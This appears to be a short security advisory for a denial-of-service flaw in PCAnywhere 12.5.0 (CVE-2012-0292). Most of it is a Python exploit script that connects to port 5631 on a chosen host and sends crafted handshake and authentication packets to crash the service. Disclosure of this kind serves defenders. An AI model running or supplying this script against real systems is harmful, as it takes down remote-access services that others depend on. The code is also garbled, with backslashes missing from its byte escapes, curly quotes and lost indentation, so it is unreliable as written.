PCAnywhere build Denial of Service Exploit

Summary

PCAnywhere 12.5.0 build 463 suffers from denial of service Vulnerability.

Credit:

The information has been provided by Johnathan Norman.


Details

Vulnerable Systems:
 * PCAnywhere 12.5.0

import sys
import socket
import argparse

if len(sys.argv) != 2:
print ‘[+] Usage: ./pcNuke.py <HOST>’
sys.exit(1)
HOST = sys.argv[1]
PORT = 5631
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

# HELLO!
s.send(‘x00x00x00x00’)
buf = s.recv(1024)

# ACK!
s.send(‘x6fx06xfe’)
buf = s.recv(1024)

# Auth capability part 1
s.send(‘x6fx62xffx09x00x07x00x00x01xffx00x00x07x00’)
# Auth capability part 2
s.send(‘x6fx62xffx09x00x07x00x00x01xffx00x00x07x00’)

CVE Information:
2012-0292

Disclosure Timeline:
Published: 2012-02-17

Categories: Exploits